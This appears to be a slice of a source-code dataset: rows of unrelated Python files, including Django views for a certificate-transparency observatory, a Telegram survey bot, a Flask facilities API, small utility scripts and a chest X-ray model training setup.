if args.folds==0:
nfolds = len(glob.glob(os.path.join(args.work_dir,'loss*.png')))
print(f' --folds not specified, will use {nfolds}')
else:
nfolds=args.folds
main(nfolds,args.work_dir)
|
6,381 | bcc959dcdb60c55897158e85d73c59592b112c12 | from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from django.db.models import Count
from django.db.models import QuerySet
from django.db import connection
from django.core.paginator import Paginator, PageNotAnInteger
from django.http import HttpResponse
from django.http import HttpResponsePermanentRedirect
import datetime
import os
import json
from ctobservatory.settings import BASE_DIR
from .models import *
from notification.forms import SubscribeUnsubscribeForm
#from .issuefinder import *
import observer.issuefinder as issuefinder
from django.template.defaulttags import register
import hashlib
import psycopg2
ITEMS_PER_PAGE = 50
@register.filter
def get_item(dictionary, key):
return dictionary.get(key)
class FastCountQuerySet():
def __init__(self, queryset, tablename):
self.queryset = queryset
self.tablename = tablename
def count(self):
cursor = connection.cursor()
cursor.execute("SELECT reltuples FROM pg_class WHERE relname = %s", [self.tablename])
row = cursor.fetchone()
count = int(row[0])
cursor.close()
return count
# passthrough all the other methods
def __getattr__(self, attr):
try:
return object.__getattr__(self, attr)
except AttributeError:
return getattr(self.queryset, attr)
def __getitem__(self, item):
return self.queryset[item]
class MetadataCountQuerySet():
def __init__(self, queryset, propertyname):
self.queryset = queryset
self.propertyname = propertyname
def count(self):
cursor = connection.cursor()
cursor.execute("SELECT name_value FROM metadata WHERE name_type = %s", [self.propertyname])
row = cursor.fetchone()
count = int(row[0])
cursor.close()
return count
# passthrough all the other methods
def __getattr__(self, attr):
try:
return object.__getattr__(self, attr)
except AttributeError:
return getattr(self.queryset, attr)
def __getitem__(self, key):
return self.queryset[key]
def index(request):
metadata = {}
expired_certs = 0
active_certs = 0
total_certs = 0
total_cas = 0
messages = []
if('subok' in request.GET):
messages.append({'class':'alert-info','text':'<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'})
if('unsubok' in request.GET):
messages.append({'class':'alert-info','text':'<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'})
subscribeform = SubscribeUnsubscribeForm()
with connection.cursor() as c:
c.execute("SELECT NAME_TYPE, NAME_VALUE FROM metadata")
rows = c.fetchall()
for row in rows:
metadata[row[0]] = row[1]
return render(request, 'observer/index.html',
{
'total_certs': metadata['number_of_certs'],
'total_ca': metadata['number_of_cas'],
'total_logs': CtLog.objects.count(),
'active_certs': metadata['number_of_active_certs'],
'expired_certs': metadata['number_of_expired_certs'],
'revoked_certs': metadata['number_of_revoked_certs'],
'misissued_certs': metadata['number_of_misissued_certs'],
'behaving_cas' : metadata['number_of_correctly_behaving_cas'],
'interesting_cas' : metadata['number_of_interesting_cas'],
'biggest_log' : metadata['number_of_certs_in_biggest_log'],
'biggest_log_name' : CtLog.objects.get(id=metadata['biggest_log_id']).name,
'smallest_log' : metadata['number_of_certs_in_smallest_log'],
'uptime_days': (timezone.now().date()-datetime.date(2015,10,14)).days, #TODO
'messages' : messages,
'subscribeform' : subscribeform
}
)
def search(request):
term = request.GET.get("term","")
#found_ca = Ca.objects.filter(name__icontains=term)
#found_cn_dnsname = Certificate.objects.raw("SELECT DISTINCT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, x509_notBefore(CERTIFICATE) FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE (NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s))) OR (NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s)))
#ORDER BY x509_notBefore(CERTIFICATE) DESC", [term, term])
return render(request, 'observer/search.html',
{
'term' : term
#'found_ca' : found_ca,
#'found_cn_dnsname' : found_cn_dnsname
}
)
def caall(request, page=None): #VIEW FOR CAs
if(page==None):
return HttpResponsePermanentRedirect("all/1")
page = int(page)
list_of_certs = []
filtered_qs = CaFilter(
request.GET,
queryset=Ca.objects.all().order_by('common_name')
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
return render(request, 'observer/cas.html',
{
'list_of_ca': list_of_certs,
'filter': filtered_qs#Ca.objects.annotate(num_certs=Count('certificate')).order_by('-num_certs'),
}
)
def certall(request, page=None, ae=None, issuer_ca=None): #VIEW FOR Certificates->ALL
if(page==None):
return HttpResponsePermanentRedirect("all/1")
ae = request.GET.get("algorithm")
issuer_ca = request.GET.get("issuer_ca")
date_notbefore = request.GET.get("date_notbefore")
date_notbefore_gte = request.GET.get("date_notbefore_gte")
is_active = request.GET.get("is_active")
date_notafter = request.GET.get("date_notafter")
date_notafter_lte = request.GET.get("date_notafter_lte")
page = int(page)
list_of_certs = []
filtered_qs = CertFilter(
request.GET,
queryset=MetadataCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
#Alternative filter solution for better performance
#https://localhost/cert/all/1?issuer_ca=merge&date_notbefore=&date_notbefore_gte=&is_active=&date_notafter=&date_notafter_lte=
query = FastCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active == "1" or is_active == "" or is_active == None):
if(issuer_ca != None and (is_active == None or is_active == "")):
query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and (issuer_ca == None or issuer_ca == "")):
query = FastCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'certificate')
if(issuer_ca == "" and is_active == ""):
query = FastCountQuerySet(Certificate.objects.all(), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and issuer_ca != None ):
query = FastCountQuerySet(Certificate.objects.filter(
issuer_ca__common_name__contains = issuer_ca,
not_before__lte=timezone.now(), not_after__gte=timezone.now(), ), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active == "0" or is_active == "" or is_active == None):
if(issuer_ca != None and (is_active == None or is_active == "")):
query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and (issuer_ca == None or issuer_ca == "")):
query = FastCountQuerySet(Certificate.objects.filter(not_after__lte=datetime.date.today()), 'certificate')
if(issuer_ca == "" and is_active == ""):
query = FastCountQuerySet(Certificate.objects.all(), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and issuer_ca != None ):
query = FastCountQuerySet(Certificate.objects.filter(
issuer_ca__common_name__contains = issuer_ca,
not_after__lte=datetime.date.today() ), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
####################################################
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
#if(ae != None):
#list_of_certs = Certificate.objects.raw("SELECT * FROM certificate WHERE SIGNATURE_ALGORITHM=%s", [ae])
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs,
'filter': filtered_qs
}
)
def certactive(request, page=None):
if(page==None):
return HttpResponsePermanentRedirect("active/1")
page = int(page)
list_of_certs = []
paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'number_of_active_certs'), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certexpired(request, page=None, order=None):
if(page==None):
return HttpResponsePermanentRedirect("expired/1")
page = int(page)
list_of_certs = []
paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_after__lt=timezone.now()), 'number_of_expired_certs'), ITEMS_PER_PAGE)
# paginator = Paginator(Certificate.objects.filter(not_after__lt=timezone.now()), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certrevoked(request, page=None):
if(page==None):
return HttpResponsePermanentRedirect("revoked/1")
page = int(page)
list_of_certs = []
paginator = Paginator(Certificate.objects.filter(id__in=RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certs_by_log(request, log_id, page=None):
if(page==None):
return HttpResponsePermanentRedirect("./1")
page = int(page)
log_id = int(log_id)
list_of_certs = []
paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_entries = paginator.page(page)
return render(request, 'observer/log_certs.html',
{
'log': get_object_or_404(CtLog, pk=log_id),
'list_of_entries' : list_of_entries
}
)
def certs_by_ca(request, ca_id, page=None):
if(page==None):
return HttpResponsePermanentRedirect("certificates/1")
page = int(page)
ca_id = int(ca_id)
list_of_certs = []
filtered_qs = CertFilter(
request.GET,
queryset=Certificate.objects.filter(issuer_ca=ca_id)
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs,
'filter': filtered_qs
})
# paginator = Paginator(Certificate.objects.filter(issuer_ca=ca_id), ITEMS_PER_PAGE)
# if(page in paginator.page_range):
# list_of_certs = paginator.page(page)
# return render(request, 'observer/certs.html',
# {
# 'list_of_certs': list_of_certs
# }
# )
def list_cn_certs(request, cn):
field_id = 'common name'
expression = cn
list_of_certs = Certificate.objects.raw("SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC", [cn])
#list_of_certs = Certificate.objects.filter(certificate__common_name=cn).order_by('not_before')
issues = issuefinder.get_all_issues(list(list_of_certs))
#issues = issuefinder.get_first_certificates(list_of_certs)
return render(request, 'observer/history.html',
{
'field_id': field_id,
'expression': expression,
'list_of_certs': list_of_certs,
'issues':issues
}
)
def list_dnsname_certs(request, dnsname):
field_id = 'dnsname'
expression = dnsname
list_of_certs = Certificate.objects.raw("SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC", [dnsname])
issues = issuefinder.get_all_issues(list(list_of_certs))
return render(request, 'observer/history.html',
{
'field_id': field_id,
'expression': expression,
'list_of_certs': list_of_certs,
'issues':issues
}
)
def log(request): #LOG VIEW
return render(request, 'observer/logs.html',
{
#'list_of_logs': CtLog.objects.all().annotate(entries=Count('ctlogentry')).order_by('latest_entry_id')
'list_of_logs': CtLog.objects.all().order_by('-is_active','-latest_entry_id','name')
}
)
def cadetail(request,ca_id):
ca = get_object_or_404(Ca, pk=ca_id)
#counting number of issued CA's:
number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()
return render(request, 'observer/cadetail.html', { 'ca' : ca, 'number_of_issued_ca': number_of_issued_ca})
def certdetail(request,cert_id=None,cert_sha256=None):
if cert_sha256:
cert_sha256_bin = cert_sha256.decode('hex') #Does not work on python3
cert = get_object_or_404(Certificate, certificate__sha256=cert_sha256_bin)
if cert_id:
cert = get_object_or_404(Certificate, pk=cert_id)
cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()
digest_sha256 = str(cert.get_digest_sha256()).replace(':','').lower()[2:-1]
#TODO
#Certificate.objects.raw("select (select count(*) from certificate WHERE x509_keySize(certificate) = %s)*100/cast(COUNT(*) as float) as percentage, 0 as id FROM certificate;",
#[cert.get_x509_data().get_pubkey().bits()])
#return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': round(keysize_distribution[0].percentage,2)})
return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': 'TODO', 'digest_sha256':digest_sha256})
def certraw(request,cert_id):
cert = get_object_or_404(Certificate, pk=cert_id)
response = HttpResponse(cert.certificate, content_type='application/octet-stream')
response['Content-Disposition'] = 'attachment; filename="certificate_{}.crt'.format(cert_id)
return response
def logdetail(request,log_id):
log = get_object_or_404(CtLog, pk=log_id)
number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()
return render(request, 'observer/logdetail.html', { 'log' : log, 'number_of_issued_ca' : number_of_issued_ca})
def flag(request, flag_id):
try:
with open(os.path.join(BASE_DIR, "static/flags/png/{0}.png".format(flag_id.lower())), "rb") as f:
return HttpResponse(f.read(), content_type="image/png")
except IOError:
with open(os.path.join(BASE_DIR, "static/flags/png/-.png"), "rb") as f:
return HttpResponse(f.read(), content_type="image/png")
def imprint(request):
return render(request, 'observer/imprint.html')
def issues(request):
return render(request, 'observer/issues.html')
def status(request):
status = {'analyzer':{'lastrun':0}, 'monitor':{'lastrun':0}, 'msg':'ok'}
try:
with open('/static/data/status.json', 'r') as f:
status = json.load(f)
status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status['analyzer']['lastrun'])
status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status['monitor']['lastrun'])
except Exception as e:
status['msg'] = "Could not load status file."+str(e)
return render(request, 'observer/status.html', {'status':status})
def certcheck(request):
if request.method == 'POST':
serial_post = request.POST['serial']
sqlQuery = """SELECT id FROM certificate WHERE serial=%s"""
sqlQuery_commonName = """SELECT * FROM ca WHERE """
current_time = str(datetime.datetime.now())
serial_int = int(serial_post, 16)
serial = serial_int.to_bytes((serial_int.bit_length() + 15) // 8, 'big', signed=True) or b'\0'
sqlData = (psycopg2.Binary(serial),)
found_serial = Certificate.objects.raw(sqlQuery, sqlData)
if(found_serial):
return HttpResponse(found_serial)
else:
return HttpResponse("none")
return render(request, 'observer/checkserial.html', {})
|
6,382 | c4dcb94b7d6e45b875dccde752d3621e491f1076 | correction_list = {}
correction_list["Legend of Zelda, The - Majora's Mask"] = "The Legend of Zelda - Majora's Mask"
correction_list["Legend of Zelda, The - Ocarina of Time"] = "The Legend of Zelda - Ocarina of Time"
correction_list["Doubutsu no Mori"] = "Animal Forest"
correction_list["Bomberman 64 - The Second Attack!"] = "Bomberman 64: The Second Attack"
correction_list["Tarzan"] = "Disney's Tarzan"
correction_list["RR64 - Ridge Racer 64"] = "Ridge Racer 64" |
6,383 | 5c5a0fd67a6d6e805b77ddfddfe959335daa3bad | import datetime
a = datetime.datetime.now()
while True:
print("""\
Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
""")
option = int(input("enter your option"))
print(option)
if option == 1:
print("""\
Select client name
1. Add Exercise
2. Add Dite
4. exit
""")
option1 =int(input("enter your option"))
if option1 == 1:
print("""\
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option2 =int(input("enter your option"))
option2 = option2-1
name = list[option2]
dec = input("enter the exercise name")
f = open(name,"a")
decs = dec+'--'+str(a)+'\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print("""\
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option2 =int(input("enter your option"))
option2 = option2-1
name = list[option2]
dec = input("enter the dite")
f = open(name,"a")
decs = dec+'--'+str(a)+'\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print("""\
select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option3 =int(input("enter your option"))
option3 = option3-1
name = list[option3]
f = open(name,"rt")
content =f.read()
print(content)
else:
break
|
6,384 | d2368ab243a0660cf98f1cf89d3d8f6cc85cefaa | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-10 12:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CompleteAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.CharField(max_length=200)),
('district', models.CharField(max_length=200)),
('city', models.CharField(max_length=200)),
('lendmark', models.CharField(max_length=200)),
('street', models.CharField(max_length=200)),
('pincode', models.IntegerField()),
],
),
migrations.CreateModel(
name='ContactDetail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone_num', models.IntegerField()),
('mobile_num', models.IntegerField()),
('tollfree_num', models.IntegerField()),
('website', models.URLField()),
('email', models.EmailField(max_length=254)),
],
),
migrations.CreateModel(
name='HospitalRegistration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hospital_name', models.CharField(max_length=200)),
('tagline', models.CharField(max_length=200)),
('chief_officer', models.CharField(max_length=100)),
('establishment_act', models.CharField(max_length=300)),
('issue_date', models.DateField(max_length=20)),
('number_of_bades', models.IntegerField()),
('about_us', models.TextField()),
('logo', models.ImageField(upload_to='Images/logo/')),
('hospital_photo', models.ImageField(upload_to='Images/hospital_photo/')),
('reg_certificate', models.ImageField(upload_to='Images/reg_certificate/')),
('license_certificate', models.ImageField(upload_to='Images/license_certificate/')),
],
),
]
|
6,385 | 3640f1df412b43b42fb4e856604508f698a208ad | from django.db import models
from skills.models import skill
from offres.models import Offer
# Create your models here.
class OfferRequirement(models.Model):
skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING ,default="")
offer = models.ForeignKey(Offer , on_delete=models.CASCADE, default="") |
6,386 | 681750dbf489a6a32e9ef1d6f64d493cc252b272 | from .. import dataclass # trigger the register in the dataclass package
|
6,387 | 52c356b903b1fbb8cbf24c899ed86d7bf134a821 | # -*- coding: utf-8 -*-
from lxml import etree
if __name__ == '__main__':
# xpath可以解析网页中的内容,html或者xml类型的文件都是<>开头结尾,层次非常明显
# data = '''<div>
# <ul>
# <li class="item-0"><a href="http://www.baidu.com">百度</a></li>
# <li class="item-1"><a href="http://www.baidu.com">百度</a></li>
# </ul>
# </div>
# '''
# tree = etree.HTML(data)
# print(type(data))
# print(tree, type(tree), etree.tostring(tree).decode('utf-8'), sep='\n') # sep,一行打印一个数据
# result = tree.xpath('//li') # //,查找所有li
# for i in result:
# print('--------', etree.tostring(i).decode('utf-8'))
# result = tree.xpath('/html/body/div/ul/li') # / ,查找当前路径
# for r in result:
# print('===', etree.tostring(r).decode('utf-8'))
# class是标签的属性,xpath中用@表示属性
# result = tree.xpath('//li[@class="item-0"]') # 查询所有,//;查li,li;表示条件[]
# for r in result:
# print('--------', etree.tostring(r).decode('utf-8'))
# result = tree.xpath('//a')
# for r in result:
# print('--------', etree.tostring(r).decode('utf-8'))
# 获取a中文本内容
# result = tree.xpath('//a/text()')
# print(result)
# result = tree.xpath('//li[contains(@class, "0")]') # 提取出数据所有li中class属性包含0的元素
# for r in result:
# print('--------', etree.tostring(r).decode('utf-8'))
tree = etree.parse('./data.html')
# print(etree.tostring(tree, encoding='utf-8').decode('utf-8'))
# result = tree.xpath('//li[@id="hehe"]/text()')
# print(result)
result = tree.xpath('//div[@id="p"]//li')
for r in result:
print('--------', etree.tostring(r, encoding='utf-8').decode('utf-8'))
|
6,388 | dcb2351f9489815fbec8694b446d0a93972a6590 | """1) Написать бота-консультанта, который будет собирать информацию с
пользователя (его ФИО, номер телефона, почта, адресс, пожелания).
Записывать сформированную заявку в БД (по желанию SQl/NOSQL).)."""
import telebot
from .config import TOKEN
from telebot.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton
from mongoengine import *
bot = telebot.TeleBot(TOKEN)
data = {}
connect('bot_db')
class User(Document):
surname = StringField(required=True)
name = StringField(required=True)
middle_name = StringField(required=True)
phone = StringField(required=True)
email = StringField(required=True)
address = StringField(required=True)
wishes = StringField(required=True)
@bot.message_handler(commands=['start'])
def start(message):
kb = InlineKeyboardMarkup()
button1 = InlineKeyboardButton('Да', callback_data='yes')
button2 = InlineKeyboardButton('Нет', callback_data='no')
kb.add(button1, button2)
bot.send_message(message.chat.id, 'Здравствуйте. Пройдете опрос?', reply_markup=kb)
@bot.callback_query_handler(func=lambda call: call.data == 'no')
def bye(call):
bot.send_message(call.from_user.id, 'До свидания')
@bot.callback_query_handler(func=lambda call: call.data == 'yes')
def start(call):
bot.send_message(call.from_user.id, 'Хорошо')
bot.send_message(call.from_user.id, 'Как Вас зовут?')
@bot.message_handler(content_types=['text'])
def response(message):
data['name'] = message.text
bot.send_message(message.chat.id, 'Какая у Вас фамилия?')
bot.register_next_step_handler(message, get_surname)
def get_surname(message):
data['surname'] = message.text
bot.send_message(message.chat.id, 'Как Ваше отчество?')
bot.register_next_step_handler(message, get_middle_name)
def get_middle_name(message):
data['middle_name'] = message.text
kb = ReplyKeyboardMarkup(resize_keyboard=True)
button = KeyboardButton(text='поделиться контактом', request_contact=True)
kb.add(button)
bot.send_message(message.chat.id, 'Поделитесь номером телефона?', reply_markup=kb)
bot.register_next_step_handler(message, get_phone)
@bot.message_handler(content_types=['contact'])
def get_phone(message):
data['phone'] = message.contact.phone_number
bot.send_message(message.chat.id, 'Какой у Вас e-mail?')
bot.register_next_step_handler(message, get_email)
def get_email(message):
data['email'] = message.text
bot.send_message(message.chat.id, 'Какой Ваш адрес?')
bot.register_next_step_handler(message, get_address)
def get_address(message):
data['address'] = message.text
bot.send_message(message.chat.id, 'Какие у Вас пожелания?')
bot.register_next_step_handler(message, get_wishes)
def get_wishes(message):
data['wishes'] = message.text
User.objects.create(**data)
bot.send_message(message.chat.id, 'Спасибо.')
bot.polling()
|
6,389 | 573674e50e05880a2822f306c125207b382d872f | from django.conf import settings
from django.contrib import admin
from django.urls import path, include, reverse_lazy
from django.views.generic import RedirectView, TemplateView
from mainapp.views import ShortURLRedirect
urlpatterns = [
path('', TemplateView.as_view(template_name='mainapp/index.html'), name='index'),
path('code/<int:pk>', TemplateView.as_view(template_name='mainapp/index.html'), name='code'),
path('auth/', include('authapp.urls', namespace='authapp')),
path('api/', include('api.urls', namespace='api')),
path('s/<slug:link>', ShortURLRedirect.as_view(), name='short_link'),
path('admin/', admin.site.urls),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns += path('__debug__/', include(debug_toolbar.urls)),
|
6,390 | e70ebd9bb9cd7027772ec117cb91349afba7ab10 | #TODO: allow workers to pull this from cache
RABBITMQ_IP = '172.23.105.82'
OBJECT_CACHE_IP = "172.23.105.69"
OBJECT_CACHE_PORT = "11911"
SERIESLY_IP = ''
COUCHBASE_IP = '172.23.105.54'
COUCHBASE_PORT = '8091'
COUCHBASE_USER = "Administrator"
COUCHBASE_PWD = "password"
SSH_USER = "root"
SSH_PASSWORD = "password"
WORKERS = ['127.0.0.1']
WORKER_CONFIGS = ["all"]
CB_CLUSTER_TAG = "default"
CLUSTER_IPS = ["172.23.105.54", "172.23.105.57", "172.23.105.62", "172.23.105.55"]
# xdcr config
"""
" pointer information to remote sites
" remote1 = name for remote site
" RABBITMQ_IP = broker managing remote site (can be same as local broker if using different vhosts)
" this should equal RABBITMQ_IP of remote site
" CB_CLUSTER_TAG = represents vhost watched by workers remote site.
" this should equal CB_CLUSTER_TAG of remote site
" COUCHBASE_IP/PORT = IP/PORT of a couchbase node in remote site
"""
REMOTE_SITES = {"remote1" : {"RABBITMQ_IP" : "172.23.105.99",
"CB_CLUSTER_TAG" : "default",
"COUCHBASE_IP" : "172.23.105.58",
"COUCHBASE_PORT" : "8091"}}
LOGDIR="logs" # relative to current dir
#Backup Config
ENABLE_BACKUPS = False
BACKUP_DIR = "/tmp/backup"
BACKUP_NODE_IP = "127.0.0.1"
BACKUP_NODE_SSH_USER = "root"
BACKUP_NODE_SSH_PWD = "password"
|
6,391 | 2424d667e1bb4ee75b5053eb6f9b002787a5317f | from flask import Flask, request, jsonify
import sqlite3
from database import Database
app = Flask(__name__)
db = Database()
@app.route('/')
def homepage():
argslist = request.args
faciltype = argslist.get('facil')
facils = []
try:
facils = db.getFacilitiesFromFacilityType(faciltype)
facils = map(lambda facil: facil.toDictNoType(), facils)
# https://stackoverflow.com/questions/5022066/how-to-serialize-sqlalchemy-result-to-json
except:
facils = []
return jsonify(facilities=facils)
@app.route('/auto')
def autocomplete():
argslist = request.args
terms = []
try:
term = argslist.get('term')
if len(term) > 0:
terms = db.getBuildingsLike(term)
terms = map(lambda bldg: bldg.toDictNoLatLon(), terms)
except:
terms = []
return jsonify(terms=terms)
@app.route('/building-location')
def getBuilding():
argslist = request.args
bldg = {}
try:
bldg = argslist.get('name')
bldg = db.getBuilding(bldg)
bldg = bldg.toDict()
except:
bldg = {}
return jsonify(building=bldg)
@app.route('/building')
def getFacilitiesFromBuilding():
argslist = request.args
facils = []
try:
bldg = argslist.get('name')
facils = db.getFacilitiesFromBuilding(bldg)
facils = map(lambda facil: facil.toDict(), facils)
except:
facils = []
return jsonify(facilities=facils)
@app.route('/faciltypes')
def getFacilityTypes():
argslist = request.args
faciltypes = []
try:
faciltypes = db.getAllFacilityTypes()
faciltypes = map(lambda faciltype: faciltype.name, faciltypes)
except:
faciltypes = []
return jsonify(facility_types=faciltypes)
if __name__ == '__main__':
app.run(debug=True, use_reloader=True)
|
6,392 | 7c5877eea78c3fa8b7928219edd52e2502c16c09 | from django import forms
class TeacherForm(forms.Form):
name = forms.CharField(label='Your Name', max_length=100, widget=forms.TextInput(
attrs={'class': 'form-control text-center w-75 mx-auto'}))
email = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control text-center w-75 mx-auto'}))
|
6,393 | 2471daad5969da29a20417a099a3ecd92fa036b4 | import sys
import array
import random
import math
import gameduino2.prep
import zlib
import struct
import gameduino as GD
from eve import align4
from PIL import Image
import numpy as np
import wave
import common
GLOWR = (128, 256)
GLOWR = (160, 400)
sys.path.append("/home/jamesb/git/gd2-asset/examples/nightstrike")
import night0
class Renderer(common.Branded):
def __init__(self, eve):
self.eve = eve
self.t = 0
def load(self):
eve = self.eve
eve.cc(open("/home/jamesb/git/gd2-asset/examples/nightstrike/night0.gd3", "rb").read())
def draw(self):
eve = self.eve
eve.VertexFormat(3)
eve.ClearColorRGB(0, 0, 100)
eve.Clear()
eve.Begin(GD.BITMAPS)
eve.BlendFunc(GD.SRC_ALPHA, 0)
night0.missile_a.draw(eve, 640, 360, 2, angle = self.t)
self.t += 1
|
6,394 | d566104b00ffd5f08c564ed554e0d71279a93047 | #!/usr/bin/python
import pprint
import requests
import string
import subprocess
#Create three files
f_arptable = open( 'arptable', 'w+' )
f_maclist = open( 'maclist', 'w+' )
f_maclookup = open( 'maclookup', 'w+' )
#Give write permissions the three files
subprocess.call([ 'chmod','+w','maclist' ])
subprocess.call([ 'chmod','+w','arptable' ])
subprocess.call([ 'chmod','+w','maclookup' ])
#cols = subprocess.Popen(["arp","-a"],stdout=f)
#Run an arp -a command and write the output to the arptable file
subprocess.Popen(['arp','-a'],stdout=f_arptable)
#Pull the company name from the maclookup and save the value
#in the variable devmon
maclookup_url = 'http://macvendors.co/api%s'
req = requests.get( maclookup_url % 'macs' )
req_result = pprint.pprint(req.json())
#Pull the IP and MAC from the arptable file and put them in the
#maclist file along with the value from devmon
for line in open('arptable'):
if line.startswith('?'):
ips = line.split()[1]
macs = line.split()[3]
f_maclist.write('\nIP Address: ' + ips + '\nMAC: ' + macs +
'\nDevice Manufacturer: ' + devmon + '\n' )
subprocess.Popen(['cat','maclist'])
#print("Phase 1 complete")
#with open('maclist') as fp:
# for line in fp:
# #line.getline(1)
# #mac_field = line.split(':')
# print('line'+"\n")
|
6,395 | f0f8ad7b65707bcf691847ccb387e4d026b405b5 | from django.shortcuts import render
from .models import Recipe, Author
def index(request):
recipes_list = Recipe.objects.all()
return render(request, "index.html",
{"data": recipes_list, "title": "Recipe Box"})
def recipeDetail(request, recipe_id):
recipe_detail = Recipe.objects.filter(id=recipe_id).first()
return render(request, "recipe_detail.html",
{"recipe": recipe_detail})
def authorDetail(request, author_id):
author = Author.objects.filter(id=author_id).first()
recipes = Recipe.objects.filter(author=author_id)
return render(request, "author_detail.html",
{"recipes": recipes, "author": author})
|
6,396 | 05ca7bbc3285a9e37921c0e514a2e31b05abe051 | from data_loaders.data_module import ChestDataModule
from utils.visualisation import showInRow
from models import get_model
from transforms.finetuning import ChestTrainTransforms, ChestValTransforms
from models.baseline import BaseLineClassifier
from pytorch_lightning.loggers import WandbLogger
from pytorch_lightning.callbacks import ModelCheckpoint
import torch
import pytorch_lightning as pl
from pytorch_lightning import seed_everything
seed_everything(12345)
dm = ChestDataModule(["chexpert_14"], batch_size=32, num_workers=2, balanced=False)
dm.train_transforms = ChestTrainTransforms(height=224)
dm.val_transforms = ChestValTransforms(height=224)
classifier = BaseLineClassifier(get_model("resnet18", pretrained=True),
num_classes=14,
linear=False,
learning_rate=1e-5,
b1=0.9,
b2=0.999,
weight_decay=1e-4,
multi_class=True,
mixup=False,
ct_reg=False)
wandb_logger = WandbLogger(name='baseline-NL-chexpert_14-full-Adam-1e_5',project='thesis')
checkpoint_callback = ModelCheckpoint(monitor='val_loss',
dirpath='logs/baseline/chexpert_14/',
